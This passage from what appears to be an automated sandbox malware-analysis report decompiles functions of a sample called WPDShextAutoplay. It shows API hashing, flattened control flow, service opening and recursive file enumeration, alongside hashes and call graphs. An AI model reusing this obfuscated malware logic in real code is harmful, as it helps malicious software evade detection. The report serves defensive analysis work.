2ab110 7079 2ab124 7078->7079 7080 2a6060 GetPEB 7079->7080 7089 2ab1aa 7079->7089 7081 2ab136 7080->7081 7082 2a3310 GetPEB 7081->7082 7083 2ab14c 7082->7083 7084 2a3f00 GetPEB 7083->7084 7087 2ab182 7083->7087 7085 2ab176 7084->7085 7086 2a3e60 GetPEB 7085->7086 7086->7087 7088 2a3f00 GetPEB 7087->7088 7087->7089 7090 2ab19e 7088->7090 7091 2a3e60 GetPEB 7090->7091 7091->7089

                                                                                Executed Functions

                                                                                Function 00290400, Relevance: 21.1, APIs: 14, Instructions: 132memorynativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00290448
                                                                                  • Part of subcall function 00291140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00290EFD,00000000), ref: 00291155
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00290463
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00290484
                                                                                • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0029048D
                                                                                • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00290492
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0029049F
                                                                                • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 002904A6
                                                                                • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 002904B9
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 002904E0
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 002904F7
                                                                                • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00290519
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00290530
                                                                                • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00290547
                                                                                • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00290562
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287162356.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_290000_WPDShextAutoplay.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 482429597-0
                                                                                • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction ID: c2ad199e56ffb8a0bab513d7ded0f18003d47d1950e580cec91dbf3b621b854e
                                                                                • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                                                • Instruction Fuzzy Hash: 784150B19243457EEB10EB62C846F6FB3EDAB88740F408D1CB74897291D675D9348F62
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A8E80, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 131serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 228 2a8e80-2a8e98 229 2a8ea0-2a8ea5 228->229 230 2a8f7a-2a8f7f 229->230 231 2a8eab 229->231 232 2a9011-2a9016 230->232 233 2a8f85-2a8f8a 230->233 234 2a8f3f-2a8f46 231->234 235 2a8eb1-2a8eb6 231->235 232->229 238 2a8fce-2a8fd5 233->238 239 2a8f8c-2a8f91 233->239 236 2a8f48-2a8f5e call 2a3f00 call 2a3e60 234->236 237 2a8f63-2a8f75 234->237 240 2a901b-2a9022 235->240 241 2a8ebc-2a8ec1 235->241 236->237 237->229 243 2a8ff2-2a900c OpenServiceW 238->243 244 2a8fd7-2a8fed call 2a3f00 call 2a3e60 238->244 247 2a8fbb-2a8fc0 239->247 248 2a8f93-2a8fa3 239->248 245 2a903f 240->245 246 2a9024-2a903a call 2a3f00 call 2a3e60 240->246 249 2a8efc-2a8f03 241->249 250 2a8ec3-2a8ec8 241->250 243->229 244->243 263 2a9042-2a9049 245->263 246->245 247->229 254 2a8fc6-2a8fcd 247->254 251 2a8fae-2a8fb6 248->251 252 2a8fa5-2a8fac 248->252 257 2a8f20-2a8f2f 249->257 258 2a8f05-2a8f1b call 2a3f00 call 2a3e60 249->258 250->247 253 2a8ece-2a8ed5 250->253 251->229 252->251 252->252 261 2a8ef2-2a8efa 253->261 262 2a8ed7-2a8eed call 2a3f00 call 2a3e60 253->262 257->263 275 2a8f35-2a8f3a 257->275 258->257 261->229 262->261 275->229
                                                                                C-Code - Quality: 66%
                                                                                			E002A8E80() {
				short* _v4;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t4;
				void* _t6;
				intOrPtr* _t11;
				intOrPtr* _t15;
				intOrPtr* _t19;
				intOrPtr* _t22;
				void* _t25;
				void* _t42;
				short* _t43;
				intOrPtr _t44;
				short* _t45;
				void* _t46;
				void* _t47;

				_t25 = _v4;
				_t4 = 0x1779a150;
				_t46 = _v4;
				_t43 = _v4;
				_t42 = 0;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t4 - 0xebfcc22;
						if(_t47 <= 0) {
							break;
						}
						if(_t4 == 0x1779a150) {
							_t4 = 0x23287775;
							continue;
						} else {
							if(_t4 == 0x1e3d7119) {
								if( *0x2ae270 == 0) {
									 *0x2ae270 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0x56e230f9, _t46);
								}
								_t6 = OpenServiceW(_t46, _t43, 0x10000); // executed
								_t25 = _t6;
								_t4 =  !=  ? 0xebfcc22 : 0xbf6010;
								continue;
							} else {
								if(_t4 != 0x23287775) {
									goto L22;
								} else {
									_t44 =  *0x2ae54c; // 0x32e198
									_t45 = _t44 + 0x260;
									while( *_t45 != 0x5c) {
										_t45 = _t45 + 2;
									}
									_t43 = _t45 + 2;
									_t4 = 0x10ada17;
									continue;
								}
							}
						}
						L32:
					}
					if(_t47 == 0) {
						_t11 =  *0x2ae4c8;
						if(_t11 == 0) {
							_t11 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0xe9d3e51f, _t46);
							 *0x2ae4c8 = _t11;
						}
						 *_t11(_t25);
						_t42 =  !=  ? 1 : _t42;
						_t4 = 0xd10de09;
						goto L1;
					} else {
						if(_t4 == 0xbf6010) {
							_t15 =  *0x2ae18c;
							if(_t15 == 0) {
								_t15 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0x268fe5f0, _t46);
								 *0x2ae18c = _t15;
							}
							 *_t15(_t46);
							goto L31;
						} else {
							if(_t4 == 0x10ada17) {
								_t19 =  *0x2ae310;
								if(_t19 == 0) {
									_t19 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0x9ba7cd1, _t46);
									 *0x2ae310 = _t19;
								}
								_t46 =  *_t19(0, 0, 0xf003f);
								if(_t46 == 0) {
									L31:
									return _t42;
								} else {
									_t4 = 0x1e3d7119;
									goto L1;
								}
							} else {
								if(_t4 != 0xd10de09) {
									goto L22;
								} else {
									_t22 =  *0x2ae18c;
									if(_t22 == 0) {
										_t22 = E002A3E60(_t25, E002A3F00(0x26f5757c), 0x268fe5f0, _t46);
										 *0x2ae18c = _t22;
									}
									 *_t22(_t25);
									_t4 = 0xbf6010;
									goto L1;
								}
							}
						}
					}
					goto L32;
					L22:
				} while (_t4 != 0x2dd4caa9);
				return _t42;
				goto L32;
			}




















                                                                                0x002a8e82
                                                                                0x002a8e86
                                                                                0x002a8e8c
                                                                                0x002a8e91
                                                                                0x002a8e96
                                                                                0x002a8e98
                                                                                0x002a8ea0
                                                                                0x002a8ea0
                                                                                0x002a8ea0
                                                                                0x002a8ea0
                                                                                0x002a8ea5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a8f7f
                                                                                0x002a9011
                                                                                0x00000000
                                                                                0x002a8f85
                                                                                0x002a8f8a
                                                                                0x002a8fd5
                                                                                0x002a8fed
                                                                                0x002a8fed
                                                                                0x002a8ff9
                                                                                0x002a8ffb
                                                                                0x002a9009
                                                                                0x00000000
                                                                                0x002a8f8c
                                                                                0x002a8f91
                                                                                0x00000000
                                                                                0x002a8f93
                                                                                0x002a8f93
                                                                                0x002a8f99
                                                                                0x002a8fa3
                                                                                0x002a8fa5
                                                                                0x002a8fa8
                                                                                0x002a8fae
                                                                                0x002a8fb1
                                                                                0x00000000
                                                                                0x002a8fb1
                                                                                0x002a8f91
                                                                                0x002a8f8a
                                                                                0x00000000
                                                                                0x002a8f7f
                                                                                0x002a8eab
                                                                                0x002a8f3f
                                                                                0x002a8f46
                                                                                0x002a8f59
                                                                                0x002a8f5e
                                                                                0x002a8f5e
                                                                                0x002a8f64
                                                                                0x002a8f6d
                                                                                0x002a8f70
                                                                                0x00000000
                                                                                0x002a8eb1
                                                                                0x002a8eb6
                                                                                0x002a901b
                                                                                0x002a9022
                                                                                0x002a9035
                                                                                0x002a903a
                                                                                0x002a903a
                                                                                0x002a9040
                                                                                0x00000000
                                                                                0x002a8ebc
                                                                                0x002a8ec1
                                                                                0x002a8efc
                                                                                0x002a8f03
                                                                                0x002a8f16
                                                                                0x002a8f1b
                                                                                0x002a8f1b
                                                                                0x002a8f2b
                                                                                0x002a8f2f
                                                                                0x002a9042
                                                                                0x002a9049
                                                                                0x002a8f35
                                                                                0x002a8f35
                                                                                0x00000000
                                                                                0x002a8f35
                                                                                0x002a8ec3
                                                                                0x002a8ec8
                                                                                0x00000000
                                                                                0x002a8ece
                                                                                0x002a8ece
                                                                                0x002a8ed5
                                                                                0x002a8ee8
                                                                                0x002a8eed
                                                                                0x002a8eed
                                                                                0x002a8ef3
                                                                                0x002a8ef5
                                                                                0x00000000
                                                                                0x002a8ef5
                                                                                0x002a8ec8
                                                                                0x002a8ec1
                                                                                0x002a8eb6
                                                                                0x00000000
                                                                                0x002a8fbb
                                                                                0x002a8fbb
                                                                                0x002a8fcd
                                                                                0x00000000

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(3251FEFE,?,00010000,?,3251FEFE,?,186D334D,0032E198,002A8782,?,3251FEFE,?), ref: 002A8FF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenService
                                                                                • String ID: uw(#$uw(#
                                                                                • API String ID: 3098006287-1105621689
                                                                                • Opcode ID: 1db4e372c8bb75450e83a583b3f6798fd6d85376841199befee3a598f1827bdb
                                                                                • Instruction ID: c60d87c348725e143b4ef14eae7f308f2fb69a6aa3b4ea1c8fc6542ec225c244
                                                                                • Opcode Fuzzy Hash: 1db4e372c8bb75450e83a583b3f6798fd6d85376841199befee3a598f1827bdb
                                                                                • Instruction Fuzzy Hash: 9E41EA21B34206DFDF20ABBDAC8473AA2D6AB97750F510429F946C7B51FE70CC514B91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A38F0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 189fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 375 2a38f0-2a390b 376 2a3910-2a3915 375->376 377 2a391b 376->377 378 2a3a69-2a3a6e 376->378 379 2a3a5f-2a3a64 377->379 380 2a3921-2a3926 377->380 381 2a3acc-2a3adf call 2a34c0 378->381 382 2a3a70-2a3a75 378->382 379->376 383 2a392c-2a3931 380->383 384 2a3a17-2a3a1e 380->384 403 2a3afc-2a3b17 381->403 404 2a3ae1-2a3af7 call 2a3f00 call 2a3e60 381->404 386 2a3ab6-2a3abb 382->386 387 2a3a77-2a3a7e 382->387 393 2a3b70-2a3b77 383->393 394 2a3937-2a393c 383->394 390 2a3a3b-2a3a4f FindFirstFileW 384->390 391 2a3a20-2a3a36 call 2a3f00 call 2a3e60 384->391 386->376 392 2a3ac1-2a3acb 386->392 388 2a3a9b-2a3ab1 387->388 389 2a3a80-2a3a96 call 2a3f00 call 2a3e60 387->389 388->376 389->388 400 2a3b97-2a3ba1 390->400 401 2a3a55-2a3a5a 390->401 391->390 398 2a3b79-2a3b8f call 2a3f00 call 2a3e60 393->398 399 2a3b94 393->399 394->386 402 2a3942-2a3947 394->402 398->399 399->400 401->376 409 2a394d-2a3953 402->409 410 2a39f1-2a3a12 402->410 424 2a3b19-2a3b2f call 2a3f00 call 2a3e60 403->424 425 2a3b34-2a3b3f 403->425 404->403 416 2a3974-2a3976 409->416 417 2a3955-2a395d 409->417 410->376 420 2a3978-2a398b call 2a34c0 416->420 421 2a396d-2a3972 416->421 417->421 428 2a395f-2a3963 417->428 437 2a39a8-2a39ec call 2a38f0 call 2a3460 420->437 438 2a398d-2a39a3 call 2a3f00 call 2a3e60 420->438 421->376 424->425 440 2a3b5c-2a3b6b 425->440 441 2a3b41-2a3b57 call 2a3f00 call 2a3e60 425->441 428->416 433 2a3965-2a396b 428->433 433->416 433->421 437->376 438->437 440->376 441->440
                                                                                C-Code - Quality: 63%
                                                                                			E002A38F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				short _v524;
				char _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				signed int _t34;
				void* _t39;
				intOrPtr* _t42;
				signed int _t46;
				intOrPtr* _t50;
				intOrPtr _t55;
				void* _t56;
				void* _t91;
				void* _t92;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t98;

				_t91 = __ecx;
				_t95 = __edx;
				_v1640 = __ecx;
				_t22 = 0x25a25425;
				_t56 = _v1640;
				while(1) {
					L1:
					_t98 = _t22 - 0x25a25425;
					if(_t98 > 0) {
						break;
					}
					if(_t98 == 0) {
						_t22 = 0x29bc40d3;
						continue;
					} else {
						if(_t22 == 0x8a099c9) {
							if( *0x2ae430 == 0) {
								 *0x2ae430 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0x83efb111, _t95);
							}
							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
							_t56 = _t39;
							if(_t56 == 0xffffffff) {
								return _t39;
							} else {
								_t22 = 0x1a4f9837;
								continue;
							}
						} else {
							if(_t22 == 0xb46fa16) {
								_t42 =  *0x2adba4;
								if(_t42 == 0) {
									_t42 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0xd274268a, _t95);
									 *0x2adba4 = _t42;
								}
								return  *_t42(_t56);
							}
							if(_t22 != 0x1a4f9837) {
								L27:
								if(_t22 != 0x55fa1f4) {
									continue;
								} else {
									return _t22;
								}
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t46 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L12:
										if(_t95 == 0) {
											goto L11;
										} else {
											_t94 = E002A34C0(0x2ad290);
											_t50 =  *0x2ae158;
											if(_t50 == 0) {
												_t50 = E002A3E60(_t56, E002A3F00(0xc6fbcd74), 0xba71dd03, _t95);
												 *0x2ae158 = _t50;
											}
											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
											E002A38F0( &_v1044, _t95, _a4, _a8);
											_t96 = _t96 + 0x1c;
											E002A3460(_t94);
											_t22 = 0x36cb81de;
										}
									} else {
										_t55 = _v1590;
										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
											L11:
											_t22 = 0x36cb81de;
										} else {
											goto L12;
										}
									}
								}
								continue;
							}
						}
					}
					L40:
				}
				if(_t22 == 0x29bc40d3) {
					_t93 = E002A34C0(0x2ad260);
					_t24 =  *0x2ae158;
					if(_t24 == 0) {
						_t24 = E002A3E60(_t56, E002A3F00(0xc6fbcd74), 0xba71dd03, _t95);
						 *0x2ae158 = _t24;
					}
					 *_t24( &_v524, 0x104, _t93, _t91);
					_t26 =  *0x2ae494;
					_t96 = _t96 + 0x10;
					if(_t26 == 0) {
						_t26 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0x7facde30, _t95);
						 *0x2ae494 = _t26;
					}
					_t92 =  *_t26();
					_t28 =  *0x2adf30;
					if(_t28 == 0) {
						_t28 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0x5010a54d, _t95);
						 *0x2adf30 = _t28;
					}
					 *_t28(_t92, 0, _t93);
					_t91 = _v1652;
					_t22 = 0x8a099c9;
					goto L1;
				} else {
					if(_t22 != 0x36cb81de) {
						goto L27;
					} else {
						_t33 =  *0x2adf88;
						if(_t33 == 0) {
							_t33 = E002A3E60(_t56, E002A3F00(0x9bab0b12), 0xa53a5b1a, _t95);
							 *0x2adf88 = _t33;
						}
						_t34 =  *_t33(_t56,  &_v1636);
						asm("sbb eax, eax");
						_t22 = ( ~_t34 & 0x0f089e21) + 0xb46fa16;
						goto L1;
					}
				}
				goto L40;
			}































                                                                                0x002a38fa
                                                                                0x002a38fc
                                                                                0x002a38fe
                                                                                0x002a3902
                                                                                0x002a3907
                                                                                0x002a3910
                                                                                0x002a3910
                                                                                0x002a3910
                                                                                0x002a3915
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a391b
                                                                                0x002a3a5f
                                                                                0x00000000
                                                                                0x002a3921
                                                                                0x002a3926
                                                                                0x002a3a1e
                                                                                0x002a3a36
                                                                                0x002a3a36
                                                                                0x002a3a48
                                                                                0x002a3a4a
                                                                                0x002a3a4f
                                                                                0x002a3ba1
                                                                                0x002a3a55
                                                                                0x002a3a55
                                                                                0x00000000
                                                                                0x002a3a55
                                                                                0x002a392c
                                                                                0x002a3931
                                                                                0x002a3b70
                                                                                0x002a3b77
                                                                                0x002a3b8a
                                                                                0x002a3b8f
                                                                                0x002a3b8f
                                                                                0x00000000
                                                                                0x002a3b95
                                                                                0x002a393c
                                                                                0x002a3ab6
                                                                                0x002a3abb
                                                                                0x00000000
                                                                                0x002a3acb
                                                                                0x002a3acb
                                                                                0x002a3acb
                                                                                0x002a3942
                                                                                0x002a3947
                                                                                0x002a39fd
                                                                                0x002a3a06
                                                                                0x002a3a0d
                                                                                0x002a394d
                                                                                0x002a3953
                                                                                0x002a3974
                                                                                0x002a3976
                                                                                0x00000000
                                                                                0x002a3978
                                                                                0x002a3982
                                                                                0x002a3984
                                                                                0x002a398b
                                                                                0x002a399e
                                                                                0x002a39a3
                                                                                0x002a39a3
                                                                                0x002a39bc
                                                                                0x002a39d8
                                                                                0x002a39dd
                                                                                0x002a39e2
                                                                                0x002a39e7
                                                                                0x002a39e7
                                                                                0x002a3955
                                                                                0x002a3955
                                                                                0x002a395d
                                                                                0x002a396d
                                                                                0x002a396d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a395d
                                                                                0x002a3953
                                                                                0x00000000
                                                                                0x002a3947
                                                                                0x002a393c
                                                                                0x002a3926
                                                                                0x00000000
                                                                                0x002a391b
                                                                                0x002a3a6e
                                                                                0x002a3ad6
                                                                                0x002a3ad8
                                                                                0x002a3adf
                                                                                0x002a3af2
                                                                                0x002a3af7
                                                                                0x002a3af7
                                                                                0x002a3b0b
                                                                                0x002a3b0d
                                                                                0x002a3b12
                                                                                0x002a3b17
                                                                                0x002a3b2a
                                                                                0x002a3b2f
                                                                                0x002a3b2f
                                                                                0x002a3b36
                                                                                0x002a3b38
                                                                                0x002a3b3f
                                                                                0x002a3b52
                                                                                0x002a3b57
                                                                                0x002a3b57
                                                                                0x002a3b60
                                                                                0x002a3b62
                                                                                0x002a3b66
                                                                                0x00000000
                                                                                0x002a3a70
                                                                                0x002a3a75
                                                                                0x00000000
                                                                                0x002a3a77
                                                                                0x002a3a77
                                                                                0x002a3a7e
                                                                                0x002a3a91
                                                                                0x002a3a96
                                                                                0x002a3a96
                                                                                0x002a3aa1
                                                                                0x002a3aa5
                                                                                0x002a3aac
                                                                                0x00000000
                                                                                0x002a3aac
                                                                                0x002a3a75
                                                                                0x00000000

                                                                                APIs
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 002A3A48
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: .
                                                                                • API String ID: 1974802433-248832578
                                                                                • Opcode ID: ada948065a69a4d432ad6da8d3ca3dbacb24cf7d6bf8b2394e4fa1a99db2347d
                                                                                • Instruction ID: 916440c487e03bb16fa94069c98967007fdff78914de80f7471710c252e910d3
                                                                                • Opcode Fuzzy Hash: ada948065a69a4d432ad6da8d3ca3dbacb24cf7d6bf8b2394e4fa1a99db2347d
                                                                                • Instruction Fuzzy Hash: EE5125317342024BCF24EF68A845ABBB6A69BE3704F000919F556C7352EF75CF2587A2
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A5040, Relevance: 1.7, APIs: 1, Instructions: 248memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 586 2a5040-2a5057 587 2a505c 586->587 588 2a5060-2a5066 587->588 589 2a51af-2a51b5 588->589 590 2a506c 588->590 593 2a51bb 589->593 594 2a52f9-2a52ff 589->594 591 2a5072-2a5078 590->591 592 2a5367-2a536e 590->592 597 2a507a 591->597 598 2a50f9-2a50ff 591->598 601 2a538b-2a5396 592->601 602 2a5370-2a5386 call 2a3f00 call 2a3e60 592->602 595 2a51c1-2a51c7 593->595 596 2a5277-2a527e 593->596 599 2a52e8-2a52ee 594->599 600 2a5301-2a5308 594->600 603 2a526d-2a5272 595->603 604 2a51cd-2a51d3 595->604 609 2a529b-2a52c5 596->609 610 2a5280-2a5296 call 2a3f00 call 2a3e60 596->610 605 2a507c-2a5082 597->605 606 2a50c2-2a50c9 597->606 607 2a5153-2a515a 598->607 608 2a5101-2a5107 598->608 611 2a53b9-2a53c0 599->611 612 2a52f4 599->612 613 2a530a-2a5320 call 2a3f00 call 2a3e60 600->613 614 2a5325-2a5330 600->614 634 2a5398-2a53ae call 2a3f00 call 2a3e60 601->634 635 2a53b3-2a53b6 601->635 602->601 603->588 604->599 623 2a51d9-2a51e0 604->623 616 2a50ad-2a50c0 605->616 617 2a5084-2a508a 605->617 619 2a50cb-2a50e1 call 2a3f00 call 2a3e60 606->619 620 2a50e6-2a50e9 606->620 626 2a515c-2a5172 call 2a3f00 call 2a3e60 607->626 627 2a5177-2a5182 607->627 608->599 624 2a510d-2a5114 608->624 650 2a52e2 609->650 651 2a52c7-2a52dd call 2a3f00 call 2a3e60 609->651 610->609 612->587 613->614 643 2a534d-2a535b RtlAllocateHeap 614->643 644 2a5332-2a5348 call 2a3f00 call 2a3e60 614->644 616->588 617->599 629 2a5090-2a50ab call 2a42c0 617->629 619->620 652 2a50ef-2a50f4 620->652 636 2a51fd-2a521f 623->636 637 2a51e2-2a51f8 call 2a3f00 call 2a3e60 623->637 638 2a5131-2a514e 624->638 639 2a5116-2a512c call 2a3f00 call 2a3e60 624->639 626->627 659 2a519f-2a51aa 627->659 660 2a5184-2a519a call 2a3f00 call 2a3e60 627->660 629->587 634->635 635->611 636->652 680 2a5225-2a522c 636->680 637->636 638->587 639->638 643->611 661 2a535d-2a5362 643->661 644->643 650->599 651->650 652->587 659->587 660->659 661->587 688 2a5249-2a5268 680->688 689 2a522e-2a5244 call 2a3f00 call 2a3e60 680->689 688->588 689->688
                                                                                C-Code - Quality: 61%
                                                                                			E002A5040(intOrPtr __ecx, intOrPtr __edx) {
				char _v4;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				void* _v36;
				intOrPtr _v44;
				signed int _v52;
				void* _v68;
				void* __ebx;
				void* __ebp;
				void* _t16;
				void* _t17;
				void* _t23;
				void* _t26;
				void* _t29;
				void* _t31;
				void* _t35;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t45;
				void* _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t58;
				intOrPtr* _t101;
				void* _t103;
				signed int _t104;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t115;
				void* _t116;

				_t101 = _v12;
				_t58 = 0;
				_v16 = __edx;
				_t112 = 0;
				_v20 = __ecx;
				_t104 = 0x1ca940c1;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t115 = _t104 - 0x12f72f95;
						if(_t115 <= 0) {
							break;
						}
						__eflags = _t104 - 0x26342ffd;
						if(__eflags > 0) {
							__eflags = _t104 - 0x2fab56c4;
							if(_t104 != 0x2fab56c4) {
								goto L40;
							} else {
								_t17 =  *0x2ae494;
								__eflags = _t17;
								if(_t17 == 0) {
									_t17 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x7facde30, _t112);
									 *0x2ae494 = _t17;
								}
								_t105 =  *_t17();
								__eflags =  *0x2add18;
								if( *0x2add18 == 0) {
									 *0x2add18 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x9ff0609c, _t112);
								}
								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
								_t58 = _t16;
								__eflags = _t58;
								if(_t58 != 0) {
									_t104 = 0x8956eec;
									while(1) {
										_t16 = _v28;
										goto L2;
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t23 =  *0x2ae484;
								__eflags = _t23;
								if(_t23 == 0) {
									_t23 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x9e91db81, _t112);
									 *0x2ae484 = _t23;
								}
								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
								asm("sbb esi, esi");
								_t26 =  *0x2ae18c;
								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
								__eflags = _t26;
								if(_t26 == 0) {
									_t26 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x268fe5f0, _t112);
									 *0x2ae18c = _t26;
								}
								_t16 =  *_t26(_v44);
								goto L40;
							} else {
								__eflags = _t104 - 0x1ca940c1;
								if(_t104 == 0x1ca940c1) {
									_t104 = 0x2fab56c4;
									continue;
								} else {
									__eflags = _t104 - 0x254bd927;
									if(_t104 != 0x254bd927) {
										L40:
										__eflags = _t104 - 0x1f0f293e;
										if(_t104 != 0x1f0f293e) {
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										}
									} else {
										_t50 =  *0x2ae29c;
										__eflags = _t50;
										if(_t50 == 0) {
											_t50 = E002A3E60(_t58, E002A3F00(0x26f5757c), 0x4574c66, _t112);
											 *0x2ae29c = _t50;
										}
										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
										__eflags = _t51;
										if(_t51 == 0) {
											L13:
											_t104 = 0x11e09e52;
											while(1) {
												_t16 = _v28;
												goto L2;
											}
										} else {
											_t52 =  *0x2ade08;
											__eflags = _t52;
											if(_t52 == 0) {
												_t52 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0xd8ef4c49, _t112);
												 *0x2ade08 = _t52;
											}
											_t53 =  *_t52();
											_t104 = 0x128dff18;
											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
											_t16 = _t58 + _v52 * 0x2c;
											__eflags = _t103 - _t16;
											_v68 = _t16;
											_t101 =  >=  ? _t58 : _t103;
											continue;
										}
										L55:
									}
								}
							}
						}
						L54:
						return _t16;
						goto L55;
					}
					if(_t115 == 0) {
						_t29 =  *0x2ae494;
						__eflags = _t29;
						if(_t29 == 0) {
							_t29 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x7facde30, _t112);
							 *0x2ae494 = _t29;
						}
						_t107 =  *_t29();
						_t31 =  *0x2adf30;
						__eflags = _t31;
						if(_t31 == 0) {
							_t31 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x5010a54d, _t112);
							 *0x2adf30 = _t31;
						}
						return  *_t31(_t107, 0, _t58);
					}
					_t116 = _t104 - 0x10f7fbef;
					if(_t116 > 0) {
						__eflags = _t104 - 0x11e09e52;
						if(_t104 == 0x11e09e52) {
							_t35 =  *0x2ae494;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x7facde30, _t112);
								 *0x2ae494 = _t35;
							}
							_t108 =  *_t35();
							_t37 =  *0x2adf30;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E002A3E60(_t58, E002A3F00(0x9bab0b12), 0x5010a54d, _t112);
								 *0x2adf30 = _t37;
							}
